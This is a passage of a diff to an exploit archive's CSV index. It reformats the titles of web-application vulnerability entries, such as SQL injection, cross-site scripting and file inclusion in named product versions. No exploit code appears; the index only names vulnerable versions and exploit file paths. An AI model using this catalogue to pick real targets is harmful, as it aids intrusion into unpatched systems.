32672,platforms/php/webapps/32672.txt,"Easysitenetwork Jokes Complete Website - 'joke.php' SQL Injection",2008-12-18,Ehsan_Hp200,php,webapps,0 32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 - HTML Injection",2008-12-19,"Moritz Naumann",php,webapps,0 32677,platforms/jsp/webapps/32677.txt,"Openfire 3.6.2 - 'group-summary.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 @@ -33010,8 +33021,8 @@ id,file,description,date,author,platform,type,port 32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0 32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0 32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 - 'login.php' SQL Injection",2009-01-14,darkjoker,php,webapps,0 -32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 -32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0 +32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 +32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - '/modules/rss/handler_image.php' 'i' Parameter Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0 32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32730,platforms/asp/webapps/32730.txt,"Active Bids - 'search' Parameter Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0 32731,platforms/asp/webapps/32731.txt,"Active Bids - 'search' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 @@ -33047,7 +33058,7 @@ id,file,description,date,author,platform,type,port 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - Cross-Site Request Forgery",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 -32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injection",2009-02-10,"Francesco Bianchino",asp,webapps,0 +32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injections",2009-02-10,"Francesco Bianchino",asp,webapps,0 32802,platforms/php/webapps/32802.txt,"Clipbucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,php,webapps,0 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 @@ -33140,7 +33151,7 @@ id,file,description,date,author,platform,type,port 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 -32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.php sorter_value Parameter' SQL Injection",2014-04-22,chapp,php,webapps,80 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 @@ -33155,7 +33166,7 @@ id,file,description,date,author,platform,type,port 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Plugin Work-The-Flow 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php read Parameter' Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 @@ -33325,7 +33336,7 @@ id,file,description,date,author,platform,type,port 33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 - atributo.php URL Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 - atributo_list.php Multiple Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 - caso_insert.php URL Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection",2009-11-17,blackenedsecurity,asp,webapps,0 +33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,asp,webapps,0 33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' Parameter SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 33365,platforms/php/webapps/33365.txt,"WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 40345,platforms/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0 @@ -33428,7 +33439,7 @@ id,file,description,date,author,platform,type,port 33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 -33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 +33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injections",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0 33557,platforms/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80 @@ -33516,7 +33527,7 @@ id,file,description,date,author,platform,type,port 33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting",2010-03-10,ITSecTeam,php,webapps,0 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0 33760,platforms/multiple/webapps/33760.txt,"Multiple Products - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0 -33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injection",2010-03-15,Isfahan,asp,webapps,0 +33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0 @@ -33537,7 +33548,7 @@ id,file,description,date,author,platform,type,port 33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Parameter Local File Inclusion",2010-03-17,7Safe,php,webapps,0 33771,platforms/php/webapps/33771.txt,"Joomla! Component com_alert - 'q_item' Parameter SQL Injection",2010-03-17,N2n-Hacker,php,webapps,0 33772,platforms/php/webapps/33772.txt,"PHPBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,php,webapps,0 -33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injection",2010-03-18,blake,php,webapps,0 +33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections",2010-03-18,blake,php,webapps,0 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open redirection",2010-03-22,Lament,jsp,webapps,0 @@ -33586,10 +33597,10 @@ id,file,description,date,author,platform,type,port 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password Cross-Site Request Forgery",2014-06-25,nopesled,hardware,webapps,0 33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution",2014-06-25,LiquidWorm,php,webapps,0 -34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injection",2010-06-14,"High-Tech Bridge SA",php,webapps,0 +34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injections",2010-06-14,"High-Tech Bridge SA",php,webapps,0 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Parameter Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 -33875,platforms/php/webapps/33875.txt,"HuronCMS - 'index.php' Multiple SQL Injection",2010-03-30,mat,php,webapps,0 +33875,platforms/php/webapps/33875.txt,"HuronCMS - 'index.php' Multiple SQL Injections",2010-03-30,mat,php,webapps,0 33882,platforms/php/webapps/33882.txt,"CyberCMS - 'faq.php' SQL Injection",2009-11-26,hc0de,php,webapps,0 33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting",2010-04-26,indoushka,php,webapps,0 33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 - ZLanguage.php lang Parameter Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps,0 @@ -33608,7 +33619,7 @@ id,file,description,date,author,platform,type,port 33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection",2010-05-09,"Stefan Esser",php,webapps,0 33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 - URI Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Inclusion / HTML Injection",2010-04-30,"Jordi Chancel",php,webapps,0 -33914,platforms/php/webapps/33914.txt,"4x CMS - 'login.php' Multiple SQL Injection",2010-03-21,cr4wl3r,php,webapps,0 +33914,platforms/php/webapps/33914.txt,"4x CMS - 'login.php' Multiple SQL Injections",2010-03-21,cr4wl3r,php,webapps,0 33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' Parameter SQL Injection",2010-04-30,"Stefan Esser",php,webapps,0 33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - 'archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,cfm,webapps,0 33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' Parameter SQL Injection",2010-05-02,indoushka,php,webapps,0 @@ -33635,7 +33646,7 @@ id,file,description,date,author,platform,type,port 33950,platforms/php/webapps/33950.txt,"HAWHAW - 'newsread.php' SQL Injection",2010-01-31,s4r4d0,php,webapps,0 34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent Cross-Site Scripting",2014-07-18,Vulnerability-Lab,cgi,webapps,3378 33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Parameter Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 -33975,platforms/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injection",2010-05-11,"High-Tech Bridge SA",php,webapps,0 +33975,platforms/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",php,webapps,0 33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 33982,platforms/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0 @@ -33683,7 +33694,7 @@ id,file,description,date,author,platform,type,port 34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script - 'index.php' Cross-Site Scripting",2010-05-26,indoushka,php,webapps,0 34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' Parameter SQL Injection",2010-05-27,"sniper ip",php,webapps,0 34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection",2010-05-28,"Christopher Schramm",php,webapps,0 -34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0 +34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections",2010-05-28,"High-Tech Bridge SA",php,webapps,0 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0 34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0 40716,platforms/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0 @@ -33734,7 +33745,7 @@ id,file,description,date,author,platform,type,port 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0 34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0 -34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 +34111,platforms/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80 @@ -33750,7 +33761,7 @@ id,file,description,date,author,platform,type,port 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",php,webapps,0 -34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS - 'news.php' Multiple SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 +34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS - 'news.php' Multiple SQL Injections",2010-06-21,"Th3 RDX",php,webapps,0 34176,platforms/php/webapps/34176.html,"osCMax 2.0 - 'articles.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps,0 34177,platforms/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS - 'copy_folder.php' Cross-Site Scripting",2010-06-21,"High-Tech Bridge SA",php,webapps,0 34179,platforms/jsp/webapps/34179.txt,"IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting",2010-06-21,IBM,jsp,webapps,0 @@ -33830,7 +33841,7 @@ id,file,description,date,author,platform,type,port 34285,platforms/php/webapps/34285.txt,"Articlems 2.0 - 'c[]' Parameter Cross-Site Scripting",2010-12-13,Packetdeath,php,webapps,0 34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 - 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 -34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injection",2009-12-22,"Hadi Kiamarsi",php,webapps,0 +34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injections",2009-12-22,"Hadi Kiamarsi",php,webapps,0 34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection",2009-12-21,anonymous,php,webapps,0 34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 - 'SearchString' Parameter Cross-Site Scripting",2010-07-11,10n1z3d,java,webapps,0 34291,platforms/php/webapps/34291.txt,"Joomla! Component 'Rapid-Recipe' - HTML Injection",2010-07-10,Sid3^effects,php,webapps,0 @@ -33902,15 +33913,15 @@ id,file,description,date,author,platform,type,port 34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 - 'group.php' SQL Injection / HTML Injection",2010-08-05,skskilL,php,webapps,0 34411,platforms/asp/webapps/34411.txt,"DT Centrepiece 4.5 - Cross-Site Scripting / Security Bypass",2010-08-05,"High-Tech Bridge SA",asp,webapps,0 34412,platforms/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34413,platforms/php/webapps/34413.txt,"DiamondList - /user/main/update_settings setting[site_title] Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34414,platforms/php/webapps/34414.txt,"DiamondList - /user/main/update_category category[description] Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34413,platforms/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings' 'setting[site_title]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34414,platforms/php/webapps/34414.txt,"DiamondList - '/user/main/update_category' 'category[description]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34415,platforms/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34416,platforms/php/webapps/34416.txt,"Muraus Open Blog - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34417,platforms/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Parameter Cross-Site Scripting",2010-08-06,"High-Tech Bridge SA",php,webapps,0 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,php,webapps,0 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 -34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php cat Parameter' SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 +34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php' 'cat' Parameter SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 34424,platforms/php/webapps/34424.txt,"WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 @@ -33963,7 +33974,7 @@ id,file,description,date,author,platform,type,port 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 -34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php img Parameter' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php' 'img' Parameter Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34518,platforms/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 @@ -34019,7 +34030,7 @@ id,file,description,date,author,platform,type,port 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 - SQL Injection / Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site - Cross-Site Scripting",2010-09-10,Moudi,php,webapps,0 34598,platforms/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Inclusion",2009-09-11,"kurdish hackers team",php,webapps,0 -34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injections",2009-09-10,Mr.SQL,php,webapps,0 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ - edit_profile.php important Parameter Cross-Site Scripting",2009-09-11,Moudi,php,webapps,0 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ - report.php pid Parameter Cross-Site Scripting",2009-09-11,Moudi,php,webapps,0 34605,platforms/php/webapps/34605.txt,"Horde Application Framework 3.3.8 - 'icon_browser.php' Cross-Site Scripting",2010-09-06,"Moritz Naumann",php,webapps,0 @@ -34102,7 +34113,7 @@ id,file,description,date,author,platform,type,port 34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads - Cross-Site Scripting / SQL Injection",2009-07-24,Moudi,php,webapps,0 34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script - 'payment.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 -34705,platforms/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injection",2009-07-21,n3w7u,php,webapps,0 +34705,platforms/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injections",2009-07-21,n3w7u,php,webapps,0 34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Inclusion",2009-07-21,Moudi,php,webapps,0 34707,platforms/php/webapps/34707.txt,"RadAFFILIATE Links - 'index.php' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34708,platforms/php/webapps/34708.pl,"Joomla! Component 'com_tax' - 'eid' Parameter SQL Injection",2010-09-23,FL0RiX,php,webapps,0 @@ -34166,7 +34177,7 @@ id,file,description,date,author,platform,type,port 34785,platforms/php/webapps/34785.txt,"PHPMyFAQ 2.6.x - 'index.php' Cross-Site Scripting",2010-09-28,"Yam Mesicka",php,webapps,0 34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 -34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 +34788,platforms/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php' 'class_key' Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 @@ -34206,7 +34217,7 @@ id,file,description,date,author,platform,type,port 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 -34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter' SQL Injection",2014-10-02,wishnusakti,php,webapps,80 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php' 'jobid Parameter SQL 